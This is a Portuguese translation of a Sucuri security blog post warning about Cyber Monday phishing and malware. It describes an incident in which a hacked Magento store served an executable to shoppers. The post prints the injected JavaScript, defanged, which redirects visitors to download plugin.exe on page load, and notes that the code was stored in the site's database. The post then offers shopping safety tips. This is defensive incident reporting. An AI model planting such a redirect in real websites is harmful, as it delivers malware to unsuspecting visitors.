À medida que os consumidores se preparam para tirar proveito dos descontos e promoções para a Black Friday e a Cyber Monday, hackers criam sites fraudulentos, com páginas de phishing e malware para capitalizar os lucros. Nos últimos anos, e-mails específicos de phishing da Cyber Monday representaram um grande risco para os consumidores. Esses e-mails, projetados para aparecer como um site de uma empresa legítima ou varejista on-line, muitas vezes são reencaminhados para um site falso onde solicitam PINs ou outras informações financeiras sensíveis e podem potencialmente gerar roubo de identidade ou transações fraudulentas. Os scammers também usam a infiltração do motor de busca para direcionar as pessoas usando palavras-chave como “melhores ofertas da Cyber Monday” ou “melhor sexta-feira com o melhor valor”, fazendo com que links maliciosos apareçam como se fossem sites autênticos nos resultados de pesquisa. Esses sites falsos, em seguida, servem conteúdo mal-intencionado para usuários desavisados que procuram as melhores ofertas.
Nesta mesma época do ano, no ano passado, notamos um grande afluxo no número de incidentes de skimming de cartão de crédito, no entanto, a ameaça que estamos cobrindo hoje é diferente e pode levar seu site a lista negra durante a temporada de compras online.
Downloads de Malware em Sites Ecommerce
Durante uma resposta a incidente recente, descobrimos que um site Magento de comércio eletrônico estava comprometido e servindo malware para clientes que estavam tentando comprar aparelhos eletrônicos.
Enquanto o site parecia inocente à primeira vista – não continha spam, conteúdo adulto ou compartilhamento de arquivos de host, como muitos sites maliciosos – o desempenho foi significativamente mais lento do que o normal. Juntamente com os problemas de desempenho, um executável inesperado denominado plugin.exe era baixado assim que a página era carregada. Esse comportamento era um sinal de problema.
Um URL suspeito estava localizado em um include de JavaScript:
Após uma nova inspeção do fragmento de JavaScript, descobrimos que ele serviu como redirecionamento para o download que notamos anteriormente, fazendo com que os usuários desavisados baixassem o arquivo plugin.exe.
function process() { window.location = "hXXps://www.dropbox[.]com//plugin.exe?dl=1"; } window.onerror = process; process()
Assim que a página era atualizada, o include do JavaScript desaparecia. Tratava-se de um URL condicional que só era exibido para um usuário na primeira vez que navegasse a página.
Fizemos o upload do arquivo plugin.exe para o VirusTotal para fazer uma inspeção e o veredito foi claro. Com uma pontuação de 50/64, VirusTotal relatou muitos resultados maliciosos para o executável.
Um olhar rápido sobre a infraestrutura do site revelou a origem do arquivo. O JavaScript incluído foi armazenado dentro do banco de dados do Magento dentro da tabela core_config_data:
Assim que removemos o código malicioso do banco de dados, o desempenho do site foi recuperado, indicando que o redirecionamento estava usando os recursos do site.
Comprando com Segurança durante a Cyber Monday
Os hackers também querem ganhar mais dinheiro com campanhas da Cyber Monday, por isso listamos algumas dicas para você fazer compras online seguras durante no final do ano:
- Nunca clique em ou instale arquivos executáveis (.exe or .dmg) a partir de fontes desconhecidas, pois esses arquivos podem conter softwares maliciosos. Se o site que você visita solicita que você instale o software para obter descontos não o faça.
- Obtenha uma extensão de bloqueador de anúncios ou JavaScript no seu navegador para ajudar a bloquear e controlar o código indesejado de fontes maliciosas.
- Suponha que os links sejam perigosos até serem verificados. Verifique o URL do seu navegador ao efetuar uma compra e procure por erros de digitação ou erros ortográficos e verifique se o site está usando SSL para criptografar dados.
- Mantenha as assinaturas do antivírus atualizadas, pois servem como uma camada primária de proteção contra softwares indesejados.
- Evite clicar em links em emails não solicitados. Esses URLs podem te enviar para um site de phishing malicioso ou de drive-by-download.
Se você é proprietário de uma site de comércio eletrônico e acredita que seu site pode estar comprometido, você pode consultar nossos guias gratuitos para sites hackeados para receber instruções sobre como limpar um site. Precisa de ajuda com um site comprometido? Estamos sempre felizes em ajudar!
Fonte: https://blog.sucuri.net/2017/11/how-to-avoid-malicious-cyber-monday-campaigns.html
Gostou de nosso post? Compartilhe: